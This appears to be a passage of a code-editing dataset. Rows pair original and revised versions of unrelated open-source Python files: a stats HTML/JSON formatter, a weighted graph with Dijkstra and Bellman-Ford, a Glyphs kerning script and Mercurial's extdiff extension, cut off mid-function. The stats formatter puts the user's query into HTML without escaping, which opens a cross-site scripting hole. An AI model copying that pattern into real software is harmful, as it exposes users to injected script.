# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Formatting methods for stats."""
from greplin import scales
import cgi
import six
import json
import operator
import re
OPERATORS = {
'>=': operator.ge,
'>': operator.gt,
'<': operator.lt,
'<=': operator.le,
'=': operator.eq,
'==': operator.eq,
'!=': operator.ne
}
OPERATOR = re.compile('(%s)' % '|'.join(list(OPERATORS.keys())))
def runQuery(statDict, query):
"""Filters for the given query."""
parts = [x.strip() for x in OPERATOR.split(query)]
assert len(parts) in (1, 3)
queryKey = parts[0]
result = {}
for key, value in six.iteritems(statDict):
if key == queryKey:
if len(parts) == 3:
op = OPERATORS[parts[1]]
try:
queryValue = type(value)(parts[2]) if value else parts[2]
except (TypeError, ValueError):
continue
if not op(value, queryValue):
continue
result[key] = value
elif isinstance(value, scales.StatContainer) or isinstance(value, dict):
child = runQuery(value, query)
if child:
result[key] = child
return result
def htmlHeader(output, path, serverName, query = None):
"""Writes an HTML header."""
if path and path != '/':
output.write('<title>%s - Status: %s</title>' % (serverName, path))
else:
output.write('<title>%s - Status</title>' % serverName)
output.write('''
<style>
body,td { font-family: monospace }
.level div {
padding-bottom: 4px;
}
.level .level {
margin-left: 2em;
padding: 1px 0;
}
span { color: #090; vertical-align: top }
.key { color: black; font-weight: bold }
.int, .float { color: #00c }
</style>
''')
output.write('<h1 style="margin: 0">Stats</h1>')
output.write('<h3 style="margin: 3px 0 18px">%s</h3>' % serverName)
output.write(
'<p><form action="#" method="GET">Filter: <input type="text" name="query" size="20" value="%s"></form></p>' %
(query or ''))
def htmlFormat(output, pathParts = (), statDict = None, query = None):
"""Formats as HTML, writing to the given object."""
statDict = statDict or scales.getStats()
if query:
statDict = runQuery(statDict, query)
_htmlRenderDict(pathParts, statDict, output)
def _htmlRenderDict(pathParts, statDict, output):
"""Render a dictionary as a table - recursing as necessary."""
keys = list(statDict.keys())
keys.sort()
links = []
output.write('<div class="level">')
for key in keys:
keyStr = cgi.escape(_utf8str(key))
value = statDict[key]
if hasattr(value, '__call__'):
value = value()
if hasattr(value, 'keys'):
valuePath = pathParts + (keyStr,)
if isinstance(value, scales.StatContainer) and value.isCollapsed():
link = '/status/' + '/'.join(valuePath)
links.append('<div class="key"><a href="%s">%s</a></div>' % (link, keyStr))
else:
output.write('<div class="key">%s</div>' % keyStr)
_htmlRenderDict(valuePath, value, output)
else:
output.write('<div><span class="key">%s</span> <span class="%s">%s</span></div>' %
(keyStr, type(value).__name__, cgi.escape(_utf8str(value)).replace('\n', '<br/>')))
if links:
for link in links:
output.write(link)
output.write('</div>')
def _utf8str(x):
"""Like str(x), but returns UTF8."""
if six.PY3:
return str(x)
if isinstance(x, six.binary_type):
return x
elif isinstance(x, six.text_type):
return x.encode('utf-8')
else:
return six.binary_type(x)
def jsonFormat(output, statDict = None, query = None, pretty = False):
"""Formats as JSON, writing to the given object."""
statDict = statDict or scales.getStats()
if query:
statDict = runQuery(statDict, query)
indent = 2 if pretty else None
# At first, assume that strings are in UTF-8. If this fails -- if, for example, we have
# crazy binary data -- then in order to get *something* out, we assume ISO-8859-1,
# which maps each byte to a unicode code point.
try:
serialized = json.dumps(statDict, cls=scales.StatContainerEncoder, indent=indent)
except UnicodeDecodeError:
serialized = json.dumps(statDict, cls=scales.StatContainerEncoder, indent=indent, encoding='iso-8859-1')
output.write(serialized)
output.write('\n')
| pt | 0.159694 | 2.357569 | 2 |
src/weight_graph.py | kavdi/data-structures | 0 | 13587 | """Implement a weighted graph."""
class Graph(object):
    """Directed, weighted graph backed by a dict-of-dicts adjacency map.

    ``self.graph[start][end]`` holds the weight of the edge start -> end.
    Nodes may be any hashable value.
    """

    def __init__(self):
        """Create a graph with no values."""
        self.graph = {}

    def nodes(self):
        """Get all nodes in the graph as a list."""
        return list(self.graph)

    def edges(self):
        """Get all edges as a list of (start, end, weight) tuples."""
        return [(start, end, weight)
                for start, ends in self.graph.items()
                for end, weight in ends.items()]

    def add_node(self, val):
        """Add a node with a value to the graph; no-op if already present."""
        self.graph.setdefault(val, {})

    def add_edge(self, val1, val2, weight):
        """Add an edge from val1 to val2 with the given weight.

        If the node for either value does not exist, it is added to the
        graph.  An existing val1 -> val2 edge has its weight overwritten.

        :raises ValueError: if val1 == val2 (self-loops are not allowed).
        """
        if val1 == val2:
            raise ValueError('Edge needs two different values.')
        self.add_node(val1)
        self.add_node(val2)
        self.graph[val1][val2] = weight

    def del_node(self, val):
        """Remove the node with the given value and all edges touching it.

        :raises ValueError: if the node is not in the graph.
        """
        if val not in self.graph:
            raise ValueError('Value is not in the graph.')
        del self.graph[val]
        # Drop any inbound edge that pointed at the removed node.
        for edges in self.graph.values():
            edges.pop(val, None)

    def del_edge(self, val1, val2):
        """Remove the edge connecting node of val1 to node of val2.

        :raises ValueError: if no such edge exists.
        """
        try:
            del self.graph[val1][val2]
        except KeyError:
            raise ValueError('Edge is not in the graph.')

    def has_node(self, val):
        """Check if the given value is in the graph."""
        return val in self.graph

    def neighbors(self, val):
        """List all nodes the node of the given value connects to."""
        # O(1) dict membership instead of materializing nodes() each call.
        if val not in self.graph:
            raise ValueError('Value is not in the graph.')
        return list(self.graph[val])

    def adjacent(self, val1, val2):
        """Check if there is an edge connecting the nodes with given values."""
        if val1 not in self.graph or val2 not in self.graph:
            raise ValueError('Value is not in the graph.')
        return val2 in self.graph[val1]

    def breadth_first_traversal(self, start_val):
        """Get the full visited path of a breadth first traversal."""
        if start_val not in self.graph:
            raise ValueError('Value is not in the graph.')
        result = [start_val]
        row = [start_val]
        while row:
            nxt_row = []
            for node in row:
                for neighbor in self.graph[node]:
                    if neighbor not in result:
                        nxt_row.append(neighbor)
                        result.append(neighbor)
            row = nxt_row
        return result

    def depth_first_traversal(self, start_val):
        """Get the full visited path of a depth first traversal."""
        def dive(val, path):
            # Pre-order recursion into each not-yet-visited neighbor.
            for node in self.graph[val]:
                if node not in path:
                    path.append(node)
                    dive(node, path)
        if start_val not in self.graph:
            raise ValueError('Value is not in the graph.')
        result = [start_val]
        dive(start_val, result)
        return result

    def dijkstra_min(self, start, end):
        """Find the shortest path from the starting to ending node.

        Uses Dijkstra's algorithm; edge weights must be non-negative.

        :raises ValueError: if a node is missing or no path exists.
        """
        if start not in self.graph or end not in self.graph:
            raise ValueError('Node not in graph.')
        if start == end:
            return [start]
        # final maps node -> (distance, predecessor) once it is settled.
        final = {start: (0, start)}
        search = {n: (float('inf'), None) for n in self.graph if n != start}
        curr = start
        while search:
            path = final[curr][0]
            neighbors = {n: self.graph[curr][n] for n in self.graph[curr]
                         if n not in final}
            for n in neighbors:
                if path + neighbors[n] < search[n][0]:
                    search[n] = (path + neighbors[n], curr)
            # Settle the closest unsettled node.
            curr = min(search, key=lambda n: search[n][0])
            final[curr] = search[curr]
            del search[curr]
            if curr == end:
                break
        min_path = [end]
        curr = end
        prev = final[curr][1]
        if prev is None:
            # An unreachable end keeps its None predecessor.
            raise ValueError('Start and end do not connect.')
        while curr != prev:
            min_path.append(prev)
            curr = prev
            prev = final[curr][1]
        return list(reversed(min_path))

    def bellman_ford_min(self, start, end):
        """Find the shortest path from the starting to ending node.

        Uses the Bellman-Ford algorithm, so negative edge weights are
        allowed (negative cycles are not detected).

        :raises ValueError: if a node is missing or no path exists.
        """
        if start not in self.graph or end not in self.graph:
            raise ValueError('Node not in graph.')
        if start == end:
            return [start]
        distance = {n: float('inf') for n in self.graph}
        parent = {n: None for n in self.graph}
        distance[start] = 0
        edges = self.edges()  # hoisted: the edge list is loop-invariant
        for _ in range(len(self.graph) - 1):
            relaxed = False
            for edge_start, edge_end, weight in edges:
                if distance[edge_end] > distance[edge_start] + weight:
                    distance[edge_end] = distance[edge_start] + weight
                    parent[edge_end] = edge_start
                    relaxed = True
            if not relaxed:
                break  # distances stabilized; remaining passes are no-ops
        min_path = []
        curr = end
        if parent[curr] is None:
            raise ValueError('Start and end do not connect.')
        while curr is not None:
            min_path.append(curr)
            curr = parent[curr]
        return list(reversed(min_path))
| """Implement a weighted graph."""
class Graph(object):
    """Structure for values in a weighted graph."""
    # Adjacency map: self.graph[start][end] -> weight of edge start -> end.
    def __init__(self):
        """Create a graph with no values."""
        self.graph = {}
    def nodes(self):
        """Get all nodes in the graph to display in list form."""
        return list(self.graph)
    def edges(self):
        """Get all edges in graph to display in list of tuples with weights."""
        edge_list = []
        for start in self.graph:
            for end in self.graph[start]:
                edge_list.append((start, end, self.graph[start][end]))
        return edge_list
    def add_node(self, val):
        """Add a node with a value to the graph."""
        self.graph.setdefault(val, {})
    def add_edge(self, val1, val2, weight):
        """Add an edge from val1 to val2 with the given weight.

        If the node for either value does not exist, it is added to the graph.
        """
        if val1 == val2:
            raise ValueError('Edge needs two different values.')
        self.add_node(val1)
        self.add_node(val2)
        self.graph[val1][val2] = weight
    def del_node(self, val):
        """Remove the node with the given value from the graph.

        Also removes all edges connected to the node.
        """
        if val not in self.graph:
            raise ValueError('Value is not in the graph.')
        del self.graph[val]
        # Drop any inbound edges pointing at the removed node.
        for node in self.graph:
            if val in self.graph[node]:
                del self.graph[node][val]
    def del_edge(self, val1, val2):
        """Remove the edge connecting node of val1 to node of val2."""
        try:
            del self.graph[val1][val2]
        except KeyError:
            raise ValueError('Edge is not in the graph.')
    def has_node(self, val):
        """Check if the given value is in the graph."""
        return val in self.graph
    def neighbors(self, val):
        """List all nodes the node of the given value connects to."""
        if val not in self.nodes():
            raise ValueError('Value is not in the graph.')
        return list(self.graph[val])
    def adjacent(self, val1, val2):
        """Check if there is an edge connecting the nodes with given values."""
        if val1 not in self.nodes() or val2 not in self.nodes():
            raise ValueError('Value is not in the graph.')
        return val2 in self.graph[val1]
    def breadth_first_traversal(self, start_val):
        """Get the full visited path of a breadth first traversal."""
        if start_val not in self.graph:
            raise ValueError('Value is not in the graph.')
        result = [start_val]
        row = [start_val]
        while row:
            nxt_row = []
            for node in row:
                neighbors = self.graph[node]
                for neighbor in neighbors:
                    if neighbor not in result:
                        nxt_row.append(neighbor)
                        result.append(neighbor)
            row = nxt_row
        return result
    def depth_first_traversal(self, start_val):
        """Get the full visited path of a depth first traversal."""
        def dive(val, path):
            # Pre-order recursion into not-yet-visited neighbors.
            neighbors = self.graph[val]
            for node in neighbors:
                if node not in path:
                    path.append(node)
                    dive(node, path)
        if start_val not in self.graph:
            raise ValueError('Value is not in the graph.')
        result = [start_val]
        dive(start_val, result)
        return result
    def dijkstra_min(self, start, end):
        """Find the shortest path from the starting to ending node.

        Uses Dijkstra's algorithm to determine the path.  Assumes
        non-negative edge weights.
        """
        if start not in self.graph or end not in self.graph:
            raise ValueError('Node not in graph.')
        if start == end:
            return [start]
        # final: node -> (distance, predecessor) for settled nodes.
        final = {start: (0, start)}
        search = {n: (float('inf'), None) for n in self.graph if n != start}
        curr = start
        while search:
            path = final[curr][0]
            neighbors = {n: self.graph[curr][n] for n in self.graph[curr]
                         if n not in final}
            for n in neighbors:
                if path + neighbors[n] < search[n][0]:
                    search[n] = (path + neighbors[n], curr)
            # Settle the closest unsettled node (ties break by dict order).
            curr = min(search, key=lambda n: search[n][0])
            final[curr] = search[curr]
            del search[curr]
            if curr == end:
                break
        min_path = [end]
        curr = end
        prev = final[curr][1]
        if prev is None:
            # An unreachable end still has its initial None predecessor.
            raise ValueError('Start and end do not connect.')
        while curr != prev:
            min_path.append(prev)
            curr = prev
            prev = final[curr][1]
        return list(reversed(min_path))
    def bellman_ford_min(self, start, end):
        """Find the shortest path from the starting to ending node.

        Uses Bellman Ford's algorithm to determine the path.  Negative
        weights are allowed; negative cycles are not detected.
        """
        if start not in self.graph or end not in self.graph:
            raise ValueError('Node not in graph.')
        if start == end:
            return [start]
        distance = {n: float('inf') for n in self.graph}
        parent = {n: None for n in self.graph}
        distance[start] = 0
        # Relax every edge |V|-1 times.
        for _ in range(len(self.graph) - 1):
            for edge_start, edge_end, weight in self.edges():
                if distance[edge_end] > distance[edge_start] + weight:
                    distance[edge_end] = distance[edge_start] + weight
                    parent[edge_end] = edge_start
        min_path = []
        curr = end
        if parent[curr] is None:
            raise ValueError('Start and end do not connect.')
        while curr is not None:
            min_path.append(curr)
            curr = parent[curr]
        return list(reversed(min_path))
sqlitedb/settings.py | BelovN/orm | 1 | 13588 | <filename>sqlitedb/settings.py<gh_stars>1-10
class BaseCommand:
    """Common base for SQL command builders tied to a single table."""

    def __init__(self, table_name):
        self.table_name = table_name
        self._can_add = True

    @staticmethod
    def _convert_values(values):
        # Map every raw value through the SQL type converter.
        return [SQLType.convert(value) for value in values]

    def check_intersection(self, other):
        """Delegate intersection checking to this command's WHERE clause."""
        return self.where.check_intersection(other)
DB_NAME = 'database.db'
| <filename>sqlitedb/settings.py<gh_stars>1-10
class BaseCommand:
    """Common base for SQL command builders tied to a single table.

    NOTE(review): ``SQLType`` and ``self.where`` are not defined in this
    module; presumably supplied elsewhere (subclasses / other modules) --
    confirm.
    """
    def __init__(self, table_name):
        self.table_name = table_name
        self._can_add = True
    @staticmethod
    def _convert_values(values):
        # Convert each raw Python value via the SQL type converter.
        converted = [SQLType.convert(v) for v in values]
        return converted
    def check_intersection(self, other):
        # Delegated to this command's WHERE clause object.
        return self.where.check_intersection(other)
DB_NAME = 'database.db'
| none | 1 | 2.507151 | 3 |
hon/commands/clean.py | swquinn/hon | 0 | 13589 | import click
from ..cli import with_context
@click.command('clean', short_help="Cleans a book's output directories")
@with_context
def clean_command(ctx=None):
    """Remove a book's generated output directories.

    Currently a placeholder: the command is registered with the CLI but
    performs no work yet.
    """
    # Fixed user-facing typo in short_help: "a book' output" -> "a book's".
    pass
| import click
from ..cli import with_context
@click.command('clean', short_help="Cleans a book' output directories")
@with_context
def clean_command(ctx=None):
    """Clean a book's output directories.

    Not yet implemented; currently a registered no-op placeholder.
    """
    pass
| none | 1 | 1.448618 | 1 |
Kerning/Steal Kerning Groups from Font.py | justanotherfoundry/Glyphs-Scripts | 283 | 13590 | #MenuTitle: Steal Kerning Groups from Font
"""Copy kerning groups from one font to another."""
from __future__ import print_function
import vanilla
class GroupsCopy(object):
	"""GUI for copying kerning groups from one font to another"""
	def __init__(self):
		# Build the floating dialog: source popup, target popup, Copy button.
		self.w = vanilla.FloatingWindow((400, 70), "Steal kerning groups")
		self.w.text_anchor = vanilla.TextBox((15, 12+2, 130, 14), "Copy groups from:", sizeStyle='small')
		self.w.from_font = vanilla.PopUpButton((150, 12, 150, 17), self.GetFonts(isSourceFont=True), sizeStyle='small', callback=self.buttonCheck)
		self.w.text_value = vanilla.TextBox((15, 12+2+25, 130, 14), "To selected glyphs in:", sizeStyle='small')
		self.w.to_font = vanilla.PopUpButton((150, 12+25, 150, 17), self.GetFonts(isSourceFont=False), sizeStyle='small', callback=self.buttonCheck)
		self.w.copybutton = vanilla.Button((-80, 12+25, -15, 17), "Copy", sizeStyle='small', callback=self.copyGroups)
		self.w.setDefaultButton( self.w.copybutton )
		self.w.open()
		self.buttonCheck(None)
	def GetFonts(self, isSourceFont):
		# Label each open document "Family - Master"; reverse the source list
		# so the two popups default to different fonts.
		myFontList = [ "%s - %s" % ( x.font.familyName, x.selectedFontMaster().name ) for x in Glyphs.orderedDocuments() ]
		if isSourceFont:
			myFontList.reverse()
		return myFontList
	def buttonCheck(self, sender):
		# Disable Copy while source and target select the same font/master.
		fromFont = self.w.from_font.getItems()[ self.w.from_font.get() ]
		toFont = self.w.to_font.getItems()[ self.w.to_font.get() ]
		if fromFont == toFont:
			self.w.copybutton.enable( onOff=False )
		else:
			self.w.copybutton.enable( onOff=True )
	def copyGroups(self, sender):
		# Resolve the chosen popup labels back to open documents/fonts.
		fromFont = self.w.from_font.getItems()[ self.w.from_font.get() ]
		toFont = self.w.to_font.getItems()[ self.w.to_font.get() ]
		Doc_source = [ x for x in Glyphs.orderedDocuments() if ("%s - %s" % ( x.font.familyName, x.selectedFontMaster().name )) == fromFont ][0]
		Master_source = Doc_source.selectedFontMaster().id
		Font_source = Doc_source.font
		Font_target = [ x.font for x in Glyphs.orderedDocuments() if ("%s - %s" % ( x.font.familyName, x.selectedFontMaster().name )) == toFont ][0]
		Glyphs_selected = [ x.parent for x in Font_target.parent.selectedLayers() ]
		print("Syncing kerning groups for", len(Glyphs_selected), "glyphs from", Font_source.familyName, "to", Font_target.familyName, ":")
		try:
			for thisGlyph in Glyphs_selected:
				glyphName = thisGlyph.name
				try:
					# Horizontal (left/right) groups: copy only when changed.
					sourceGlyph = Font_source.glyphs[ glyphName ]
					oldL = thisGlyph.leftKerningGroup
					oldR = thisGlyph.rightKerningGroup
					newL = sourceGlyph.leftKerningGroup
					newR = sourceGlyph.rightKerningGroup
					if oldL != newL or oldR != newR:
						thisGlyph.leftKerningGroup = newL
						thisGlyph.rightKerningGroup = newR
						print(" ", glyphName, ":", newL, "<--->", newR)
					# start: temporary fix for 3.0.3 unwrapped vertical kerning
					def kerningGetter(kerning):
						# Glyphs 3.0.3 can hand back an unwrapped callable here.
						if kerning is not None and not isinstance(kerning, str):
							kerning = kerning()
						return kerning
					# end: temporary fix for 3.0.3 unwrapped vertical kerning
					# Vertical (top/bottom) groups: copy only when changed.
					oldT = kerningGetter(thisGlyph.topKerningGroup)
					oldB = kerningGetter(thisGlyph.bottomKerningGroup)
					newT = kerningGetter(sourceGlyph.topKerningGroup)
					newB = kerningGetter(sourceGlyph.bottomKerningGroup)
					if oldT != newT or oldB != newB:
						# NOTE(review): re-assigning leftKerningGroup in the
						# vertical branch looks like a copy/paste remnant from
						# the horizontal branch above -- confirm intent.
						thisGlyph.leftKerningGroup = newL
						thisGlyph.setTopKerningGroup_(newT)
						thisGlyph.setBottomKerningGroup_(newB)
						print(" ", glyphName, ":", newT, "\n ^\n |\n V\n", newB)
					pass
				except Exception as e:
					# Per-glyph failures are reported but do not stop the loop.
					print(" ", glyphName,": Error")
					# print e
		except Exception as e:
			import traceback
			print(traceback.format_exc())
		finally:
			print("Done.")
			self.w.close()
GroupsCopy()
| #MenuTitle: Steal Kerning Groups from Font
"""Copy kerning groups from one font to another."""
from __future__ import print_function
import vanilla
class GroupsCopy(object):
"""GUI for copying kerning groups from one font to another"""
def __init__(self):
self.w = vanilla.FloatingWindow((400, 70), "Steal kerning groups")
self.w.text_anchor = vanilla.TextBox((15, 12+2, 130, 14), "Copy groups from:", sizeStyle='small')
self.w.from_font = vanilla.PopUpButton((150, 12, 150, 17), self.GetFonts(isSourceFont=True), sizeStyle='small', callback=self.buttonCheck)
self.w.text_value = vanilla.TextBox((15, 12+2+25, 130, 14), "To selected glyphs in:", sizeStyle='small')
self.w.to_font = vanilla.PopUpButton((150, 12+25, 150, 17), self.GetFonts(isSourceFont=False), sizeStyle='small', callback=self.buttonCheck)
self.w.copybutton = vanilla.Button((-80, 12+25, -15, 17), "Copy", sizeStyle='small', callback=self.copyGroups)
self.w.setDefaultButton( self.w.copybutton )
self.w.open()
self.buttonCheck(None)
def GetFonts(self, isSourceFont):
myFontList = [ "%s - %s" % ( x.font.familyName, x.selectedFontMaster().name ) for x in Glyphs.orderedDocuments() ]
if isSourceFont:
myFontList.reverse()
return myFontList
def buttonCheck(self, sender):
fromFont = self.w.from_font.getItems()[ self.w.from_font.get() ]
toFont = self.w.to_font.getItems()[ self.w.to_font.get() ]
if fromFont == toFont:
self.w.copybutton.enable( onOff=False )
else:
self.w.copybutton.enable( onOff=True )
def copyGroups(self, sender):
fromFont = self.w.from_font.getItems()[ self.w.from_font.get() ]
toFont = self.w.to_font.getItems()[ self.w.to_font.get() ]
Doc_source = [ x for x in Glyphs.orderedDocuments() if ("%s - %s" % ( x.font.familyName, x.selectedFontMaster().name )) == fromFont ][0]
Master_source = Doc_source.selectedFontMaster().id
Font_source = Doc_source.font
Font_target = [ x.font for x in Glyphs.orderedDocuments() if ("%s - %s" % ( x.font.familyName, x.selectedFontMaster().name )) == toFont ][0]
Glyphs_selected = [ x.parent for x in Font_target.parent.selectedLayers() ]
print("Syncing kerning groups for", len(Glyphs_selected), "glyphs from", Font_source.familyName, "to", Font_target.familyName, ":")
try:
for thisGlyph in Glyphs_selected:
glyphName = thisGlyph.name
try:
sourceGlyph = Font_source.glyphs[ glyphName ]
oldL = thisGlyph.leftKerningGroup
oldR = thisGlyph.rightKerningGroup
newL = sourceGlyph.leftKerningGroup
newR = sourceGlyph.rightKerningGroup
if oldL != newL or oldR != newR:
thisGlyph.leftKerningGroup = newL
thisGlyph.rightKerningGroup = newR
print(" ", glyphName, ":", newL, "<--->", newR)
# start: temporary fix for 3.0.3 unwrapped vertical kerning
def kerningGetter(kerning):
if kerning is not None and not isinstance(kerning, str):
kerning = kerning()
return kerning
# end: temporary fix for 3.0.3 unwrapped vertical kerning
oldT = kerningGetter(thisGlyph.topKerningGroup)
oldB = kerningGetter(thisGlyph.bottomKerningGroup)
newT = kerningGetter(sourceGlyph.topKerningGroup)
newB = kerningGetter(sourceGlyph.bottomKerningGroup)
if oldT != newT or oldB != newB:
thisGlyph.leftKerningGroup = newL
thisGlyph.setTopKerningGroup_(newT)
thisGlyph.setBottomKerningGroup_(newB)
print(" ", glyphName, ":", newT, "\n ^\n |\n V\n", newB)
pass
except Exception as e:
print(" ", glyphName,": Error")
# print e
except Exception as e:
import traceback
print(traceback.format_exc())
finally:
print("Done.")
self.w.close()
GroupsCopy()
| pt | 0.13012 | 2.920191 | 3 |
eggs/mercurial-2.2.3-py2.7-linux-x86_64-ucs4.egg/hgext/extdiff.py | bopopescu/phyG | 0 | 13591 | # extdiff.py - external diff program support for mercurial
#
# Copyright 2006 <NAME> <<EMAIL>>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''command to allow external programs to compare revisions
The extdiff Mercurial extension allows you to use external programs
to compare revisions, or revision with working directory. The external
diff programs are called with a configurable set of options and two
non-option arguments: paths to directories containing snapshots of
files to compare.
The extdiff extension also allows you to configure new diff commands, so
you do not need to type :hg:`extdiff -p kdiff3` always. ::
[extdiff]
# add new command that runs GNU diff(1) in 'context diff' mode
cdiff = gdiff -Nprc5
## or the old way:
#cmd.cdiff = gdiff
#opts.cdiff = -Nprc5
# add new command called vdiff, runs kdiff3
vdiff = kdiff3
# add new command called meld, runs meld (no need to name twice)
meld =
# add new command called vimdiff, runs gvimdiff with DirDiff plugin
# (see http://www.vim.org/scripts/script.php?script_id=102) Non
# English user, be sure to put "let g:DirDiffDynamicDiffText = 1" in
# your .vimrc
vimdiff = gvim -f "+next" \\
"+execute 'DirDiff' fnameescape(argv(0)) fnameescape(argv(1))"
Tool arguments can include variables that are expanded at runtime::
$parent1, $plabel1 - filename, descriptive label of first parent
$child, $clabel - filename, descriptive label of child revision
$parent2, $plabel2 - filename, descriptive label of second parent
$root - repository root
$parent is an alias for $parent1.
The extdiff extension will look in your [diff-tools] and [merge-tools]
sections for diff tool arguments, when none are specified in [extdiff].
::
[extdiff]
kdiff3 =
[diff-tools]
kdiff3.diffargs=--L1 '$plabel1' --L2 '$clabel' $parent $child
You can use -I/-X and list of file or directory names like normal
:hg:`diff` command. The extdiff extension makes snapshots of only
needed files, so running the external diff program will actually be
pretty fast (at least faster than having to compare the entire tree).
'''
from mercurial.i18n import _
from mercurial.node import short, nullid
from mercurial import scmutil, scmutil, util, commands, encoding
import os, shlex, shutil, tempfile, re
def snapshot(ui, repo, files, node, tmproot):
    '''snapshot files as of some revision

    if not using snapshot, -I/-X does not work and recursive diff
    in tools like kdiff3 and meld displays too many files.

    Returns (dirname, fns_and_mtime): the snapshot directory name under
    tmproot, and for working-directory snapshots a list of
    (snapshot_path, repo_path, mtime) records.
    '''
    # Name the snapshot directory after the repo (plus short revision hash
    # when snapshotting a committed revision) so external tools show a
    # meaningful label.
    dirname = os.path.basename(repo.root)
    if dirname == "":
        dirname = "root"
    if node is not None:
        dirname = '%s.%s' % (dirname, short(node))
    base = os.path.join(tmproot, dirname)
    os.mkdir(base)
    if node is not None:
        ui.note(_('making snapshot of %d files from rev %s\n') %
                (len(files), short(node)))
    else:
        ui.note(_('making snapshot of %d files from working directory\n') %
                (len(files)))
    wopener = scmutil.opener(base)
    fns_and_mtime = []
    ctx = repo[node]
    for fn in files:
        wfn = util.pconvert(fn)
        if not wfn in ctx:
            # File doesn't exist; could be a bogus modify
            continue
        ui.note(' %s\n' % wfn)
        dest = os.path.join(base, wfn)
        fctx = ctx[wfn]
        data = repo.wwritedata(wfn, fctx.data())
        if 'l' in fctx.flags():
            # Symlink: materialize the link itself, not its target contents.
            wopener.symlink(data, wfn)
        else:
            wopener.write(wfn, data)
            if 'x' in fctx.flags():
                # Preserve the executable bit on the snapshot copy.
                util.setflags(dest, False, True)
        if node is None:
            # NOTE(review): mtimes are recorded only for working-directory
            # snapshots -- presumably so the caller can detect edits made by
            # the external tool and copy them back; confirm against dodiff().
            fns_and_mtime.append((dest, repo.wjoin(fn),
                                  os.lstat(dest).st_mtime))
    return dirname, fns_and_mtime
def dodiff(ui, repo, diffcmd, diffopts, pats, opts):
'''Do the actuall diff:
- copy to a temp structure if diffing 2 internal revisions
- copy to a temp structure if diffing working revision with
another one and more than 1 file is changed
- just invoke the diff for a single file in the working dir
'''
revs = opts.get('rev')
change = opts.get('change')
args = ' '.join(diffopts)
do3way = '$parent2' in args
if revs and change:
msg = _('cannot specify --rev and --change at the same time')
raise util.Abort(msg)
elif change:
node2 = scmutil.revsingle(repo, change, None).node()
node1a, node1b = repo.changelog.parents(node2)
else:
node1a, node2 = scmutil.revpair(repo, revs)
if not revs:
node1b = repo.dirstate.p2()
else:
node1b = nullid
# Disable 3-way merge if there is only one parent
if do3way:
if node1b == nullid:
do3way = False
matcher = scmutil.match(repo[node2], pats, opts)
mod_a, add_a, rem_a = map(set, repo.status(node1a, node2, matcher)[:3])
if do3way:
mod_b, add_b, rem_b = map(set, repo.status(node1b, node2, matcher)[:3])
else:
mod_b, add_b, rem_b = set(), set(), set()
modadd = mod_a | add_a | mod_b | add_b
common = modadd | rem_a | rem_b
if not common:
return 0
tmproot = tempfile.mkdtemp(prefix='extdiff.')
try:
# Always make a copy of node1a (and node1b, if applicable)
dir1a_files = mod_a | rem_a | ((mod_b | add_b) - add_a)
dir1a = snapshot(ui, repo, dir1a_files, node1a, tmproot)[0]
rev1a = '@%d' % repo[node1a].rev()
if do3way:
dir1b_files = mod_b | rem_b | ((mod_a | add_a) - add_b)
dir1b = snapshot(ui, repo, dir1b_files, node1b, tmproot)[0]
rev1b = '@%d' % repo[node1b].rev()
else:
dir1b = None
rev1b = ''
fns_and_mtime = []
# If node2 in not the wc or there is >1 change, copy it
dir2root = ''
rev2 = ''
if node2:
dir2 = snapshot(ui, repo, modadd, node2, tmproot)[0]
rev2 = '@%d' % repo[node2].rev()
elif len(common) > 1:
#we only actually need to get the files to copy back to
#the working dir in this case (because the other cases
#are: diffing 2 revisions or single file -- in which case
#the file is already directly passed to the diff tool).
dir2, fns_and_mtime = snapshot(ui, repo, modadd, None, tmproot)
else:
# This lets the diff tool open the changed file directly
dir2 = ''
dir2root = repo.root
label1a = rev1a
label1b = rev1b
label2 = rev2
# If only one change, diff the files instead of the directories
# Handle bogus modifies correctly by checking if the files exist
if len(common) == 1:
common_file = util.localpath(common.pop())
dir1a = os.path.join(tmproot, dir1a, common_file)
label1a = common_file + rev1a
if not os.path.isfile(dir1a):
dir1a = os.devnull
if do3way:
dir1b = os.path.join(tmproot, dir1b, common_file)
label1b = common_file + rev1b
if not os.path.isfile(dir1b):
dir1b = os.devnull
dir2 = os.path.join(dir2root, dir2, common_file)
label2 = common_file + rev2
# Function to quote file/dir names in the argument string.
# When not operating in 3-way mode, an empty string is
# returned for parent2
replace = dict(parent=dir1a, parent1=dir1a, parent2=dir1b,
plabel1=label1a, plabel2=label1b,
clabel=label2, child=dir2,
root=repo.root)
def quote(match):
key = match.group()[1:]
if not do3way and key == 'parent2':
return ''
return util.shellquote(replace[key])
# Match parent2 first, so 'parent1?' will match both parent1 and parent
regex = '\$(parent2|parent1?|child|plabel1|plabel2|clabel|root)'
if not do3way and not re.search(regex, args):
args += ' $parent1 $child'
args = re.sub(regex, quote, args)
cmdline = util.shellquote(diffcmd) + ' ' + args
ui.debug('running %r in %s\n' % (cmdline, tmproot))
util.system(cmdline, cwd=tmproot, out=ui.fout)
for copy_fn, working_fn, mtime in fns_and_mtime:
if os.lstat(copy_fn).st_mtime != mtime:
ui.debug('file changed while diffing. '
'Overwriting: %s (src: %s)\n' % (working_fn, copy_fn))
util.copyfile(copy_fn, working_fn)
return 1
finally:
ui.note(_('cleaning up temp directory\n'))
shutil.rmtree(tmproot)
def extdiff(ui, repo, *pats, **opts):
'''use external program to diff repository (or selected files)
Show differences between revisions for the specified files, using
an external program. The default program used is diff, with
default options "-Npru".
To select a different program, use the -p/--program option. The
program will be passed the names of two directories to compare. To
pass additional options to the program, use -o/--option. These
will be passed before the names of the directories to compare.
When two revision arguments are given, then changes are shown
between those revisions. If only one revision is specified then
that revision is compared to the working directory, and, when no
revisions are specified, the working directory files are compared
to its parent.'''
program = opts.get('program')
option = opts.get('option')
if not program:
program = 'diff'
option = option or ['-Npru']
return dodiff(ui, repo, program, option, pats, opts)
cmdtable = {
"extdiff":
(extdiff,
[('p', 'program', '',
_('comparison program to run'), _('CMD')),
('o', 'option', [],
_('pass option to comparison program'), _('OPT')),
('r', 'rev', [],
_('revision'), _('REV')),
('c', 'change', '',
_('change made by revision'), _('REV')),
] + commands.walkopts,
_('hg extdiff [OPT]... [FILE]...')),
}
def uisetup(ui):
for cmd, path in ui.configitems('extdiff'):
if cmd.startswith('cmd.'):
